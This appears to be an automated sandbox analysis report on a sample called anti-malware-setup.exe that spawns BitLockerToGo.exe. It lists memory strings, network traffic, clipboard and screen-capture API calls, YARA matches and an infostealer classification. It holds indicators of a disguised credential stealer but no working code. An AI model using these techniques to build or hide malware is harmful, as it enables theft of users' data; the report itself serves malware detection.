              Source: BitLockerToGo.exe, 00000003.00000003.2336106894.00000000034E4000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345391822.00000000034ED000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345618551.00000000034ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/workshop/
              Source: BitLockerToGo.exe, 00000003.00000003.2411433910.0000000003497000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.st1T
              Source: BitLockerToGo.exe, 00000003.00000003.2336259469.00000000034A9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampower
              Source: BitLockerToGo.exe, 00000003.00000003.2345618551.00000000034ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/
              Source: BitLockerToGo.exe, 00000003.00000003.2336106894.00000000034DD000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2336259469.00000000034A9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/;
              Source: BitLockerToGo.exe, 00000003.00000003.2336106894.00000000034DD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/;Persistent-AuthWWW-AuthenticateVarysteamCountry=US%7C185ce35c568ebbb
              Source: BitLockerToGo.exe, 00000003.00000003.2345618551.00000000034ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/about/
              Source: BitLockerToGo.exe, 00000003.00000003.2336106894.00000000034E4000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345391822.00000000034ED000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345618551.00000000034ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/explore/
              Source: BitLockerToGo.exe, 00000003.00000003.2336106894.00000000034DD000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2336106894.00000000034E4000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2356623216.00000000034F6000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345639041.0000000003459000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345391822.00000000034ED000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345618551.00000000034ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/legal/
              Source: BitLockerToGo.exe, 00000003.00000003.2336106894.00000000034E4000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345391822.00000000034ED000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345618551.00000000034ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/mobile
              Source: BitLockerToGo.exe, 00000003.00000003.2336106894.00000000034E4000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345391822.00000000034ED000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345618551.00000000034ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/news/
              Source: BitLockerToGo.exe, 00000003.00000003.2336106894.00000000034E4000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345391822.00000000034ED000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345618551.00000000034ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/points/shop/
              Source: BitLockerToGo.exe, 00000003.00000003.2336106894.00000000034E4000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345391822.00000000034ED000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345618551.00000000034ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/privacy_agreement/
              Source: BitLockerToGo.exe, 00000003.00000003.2336106894.00000000034E4000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345391822.00000000034ED000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345618551.00000000034ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/stats/
              Source: BitLockerToGo.exe, 00000003.00000003.2336106894.00000000034E4000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345391822.00000000034ED000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345618551.00000000034ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/steam_refunds/
              Source: BitLockerToGo.exe, 00000003.00000003.2336106894.00000000034E4000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345391822.00000000034ED000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345618551.00000000034ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/subscriber_agreement/
              Source: BitLockerToGo.exe, 00000003.00000003.2385701315.0000000005BA5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
              Source: BitLockerToGo.exe, 00000003.00000003.2385701315.0000000005BA5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
              Source: BitLockerToGo.exe, 00000003.00000003.2357767548.0000000005AB8000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2357865261.0000000005AB8000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2357621747.0000000005ABB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
              Source: BitLockerToGo.exe, 00000003.00000003.2336106894.00000000034DD000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2336259469.00000000034A9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
              Source: BitLockerToGo.exe, 00000003.00000003.2357767548.0000000005AB8000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2357865261.0000000005AB8000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2357621747.0000000005ABB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
              Source: BitLockerToGo.exe, 00000003.00000003.2336259469.00000000034A9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/recaptcha/
              Source: BitLockerToGo.exe, 00000003.00000003.2336259469.00000000034A9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.cn/recaptcha/
              Source: BitLockerToGo.exe, 00000003.00000003.2336259469.00000000034A9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/recaptcha/
              Source: BitLockerToGo.exe, 00000003.00000003.2345639041.00000000034A9000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2356666158.00000000034A9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/recaptcnT
              Source: BitLockerToGo.exe, 00000003.00000003.2385701315.0000000005BA5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.CDjelnmQJyZc
              Source: BitLockerToGo.exe, 00000003.00000003.2385701315.0000000005BA5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.b3lOZaxJcpF6
              Source: BitLockerToGo.exe, 00000003.00000003.2385701315.0000000005BA5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
              Source: BitLockerToGo.exe, 00000003.00000003.2385701315.0000000005BA5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
              Source: BitLockerToGo.exe, 00000003.00000003.2385701315.0000000005BA5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/media/img/mozorg/mozilla-256.4720741d4108.jpg
              Source: BitLockerToGo.exe, 00000003.00000003.2385701315.0000000005BA5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
              Source: BitLockerToGo.exe, 00000003.00000003.2336106894.00000000034E4000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345391822.00000000034ED000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345618551.00000000034ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback
              Source: BitLockerToGo.exe, 00000003.00000003.2336106894.00000000034DD000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2336259469.00000000034A9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com
              Source: BitLockerToGo.exe, 00000003.00000003.2336259469.00000000034A9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49787
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49796
              Source: unknownNetwork traffic detected: HTTP traffic on port 62001 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 62024 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49770
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49780
              Source: unknownNetwork traffic detected: HTTP traffic on port 49787 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49780 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 62017 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49796 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49805 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49805
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62001
              Source: unknownNetwork traffic detected: HTTP traffic on port 61984 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62024
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61984
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62017
              Source: unknownHTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.5:49770 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.5:49780 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.5:49787 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.5:49796 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.5:49805 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.5:61984 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.5:62001 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.5:62017 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.5:62024 version: TLS 1.2
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_00431AA0 OpenClipboard,GetClipboardData,GlobalLock,GetWindowLongW,GlobalUnlock,CloseClipboard,3_2_00431AA0
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_00431AA0 OpenClipboard,GetClipboardData,GlobalLock,GetWindowLongW,GlobalUnlock,CloseClipboard,3_2_00431AA0
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_00431C10 GetDC,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetCurrentObject,GetObjectW,DeleteObject,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,3_2_00431C10

              System Summary

              barindex
              Malicious sample detected (through community Yara rule)
              Source: 00000000.00000002.2322019566.000000000213A000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Metasploit Payloads - file msf.war - contents Author: Florian Roth
              Source: C:\Users\user\Desktop\anti-malware-setup.exeCode function: 0_2_00CFBD40 DuplicateHandle,GetCurrentThreadId,CreateWaitableTimerExW,CreateWaitableTimerExW,NtCreateWaitCompletionPacket,VirtualQuery,0_2_00CFBD40
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_004369803_2_00436980
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_0043E2B03_2_0043E2B0
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_00436C903_2_00436C90
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_00409D393_2_00409D39
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_004085E03_2_004085E0
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_004165E43_2_004165E4
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_0040D5FD3_2_0040D5FD
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_004206D03_2_004206D0
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_004106983_2_00410698
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_0040AF593_2_0040AF59
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_0042AF243_2_0042AF24
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_004227F63_2_004227F6
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_0041C8503_2_0041C850
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_0042A8553_2_0042A855
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_0042E85A3_2_0042E85A
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_0042F0693_2_0042F069
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_0042406D3_2_0042406D
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_004258C03_2_004258C0
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_004110E03_2_004110E0
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_004330EE3_2_004330EE
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_0041508C3_2_0041508C
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_0043D0903_2_0043D090
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_004198A03_2_004198A0
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_0040F8A63_2_0040F8A6
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_004310AA3_2_004310AA
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_004218B73_2_004218B7
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_0043D1403_2_0043D140
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_0041695C3_2_0041695C
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_004361603_2_00436160
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_004039703_2_00403970
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_004271003_2_00427100
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_004161063_2_00416106
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_004379103_2_00437910
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_0043D1D03_2_0043D1D0
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_0041D1E03_2_0041D1E0
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_0040D9ED3_2_0040D9ED
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_004299F03_2_004299F0
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_004059803_2_00405980
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_0040AA403_2_0040AA40
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_004062703_2_00406270
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_0042420E3_2_0042420E
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_004212203_2_00421220
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_004302E13_2_004302E1
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_004282FF3_2_004282FF
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_004382923_2_00438292
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_004232903_2_00423290
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_00424AB03_2_00424AB0
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_0042E3483_2_0042E348
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_0041E3603_2_0041E360
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_0040CB053_2_0040CB05
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_00426B093_2_00426B09
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_0042FB103_2_0042FB10
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_0042631D3_2_0042631D
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_004043203_2_00404320
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_00414BFF3_2_00414BFF
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_00402BA03_2_00402BA0
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_00411BB03_2_00411BB0
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_0041FC403_2_0041FC40
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_00404C503_2_00404C50
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_0041CC603_2_0041CC60
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_004234703_2_00423470
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_0043DC103_2_0043DC10
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_0041B4273_2_0041B427
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_004374D03_2_004374D0
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_004074E03_2_004074E0
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_0042B4E13_2_0042B4E1
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_004265783_2_00426578
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_00445D2A3_2_00445D2A
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_00413DC03_2_00413DC0
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_004095F03_2_004095F0
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_0041C5803_2_0041C580
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_0042D65C3_2_0042D65C
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_004316003_2_00431600
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_00421E043_2_00421E04
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_004146203_2_00414620
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_00405ED03_2_00405ED0
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_00408EE03_2_00408EE0
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_0041AE873_2_0041AE87
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_004246903_2_00424690
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_0041BE9F3_2_0041BE9F
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_00402F403_2_00402F40
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_0042A7423_2_0042A742
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_004067003_2_00406700
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_00422F303_2_00422F30
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_0043DF303_2_0043DF30
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_0043CF303_2_0043CF30
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_0043C7C43_2_0043C7C4
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_0043A7E03_2_0043A7E0
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_004247A43_2_004247A4
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_0042A7AD3_2_0042A7AD
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_0041CFB03_2_0041CFB0
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_004187B03_2_004187B0
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_0042A7BC3_2_0042A7BC
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: String function: 00408040 appears 52 times
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: String function: 00413DB0 appears 77 times
              Source: anti-malware-setup.exe, 00000000.00000002.2322019566.0000000002100000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameBITLOCKERTOGO.EXEj% vs anti-malware-setup.exe
              Source: anti-malware-setup.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: 00000000.00000002.2322019566.000000000213A000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Msfpayloads_msf_9 date = 2017-02-09, hash1 = e408678042642a5d341e8042f476ee7cef253871ef1c9e289acf0ee9591d1e81, author = Florian Roth, description = Metasploit Payloads - file msf.war - contents, reference = Internal Research
              Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@3/0@13/2
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_00436C90 CoCreateInstance,SysAllocString,CoSetProxyBlanket,SysAllocString,SysAllocString,VariantInit,VariantClear,SysFreeString,SysFreeString,SysFreeString,SysFreeString,GetVolumeInformationW,3_2_00436C90
              Source: anti-malware-setup.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: C:\Users\user\Desktop\anti-malware-setup.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: BitLockerToGo.exe, 00000003.00000003.2358199369.0000000005AA6000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2358480602.0000000005A89000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
              Source: anti-malware-setup.exeVirustotal: Detection: 72%
              Source: anti-malware-setup.exeReversingLabs: Detection: 71%
              Source: unknownProcess created: C:\Users\user\Desktop\anti-malware-setup.exe "C:\Users\user\Desktop\anti-malware-setup.exe"
              Source: C:\Users\user\Desktop\anti-malware-setup.exeProcess created: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
              Source: C:\Users\user\Desktop\anti-malware-setup.exeProcess created: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"Jump to behavior
              Source: C:\Users\user\Desktop\anti-malware-setup.exeSection loaded: powrprof.dllJump to behavior
              Source: C:\Users\user\Desktop\anti-malware-setup.exeSection loaded: umpdc.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: webio.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: mskeyprotect.dllJump to behavior
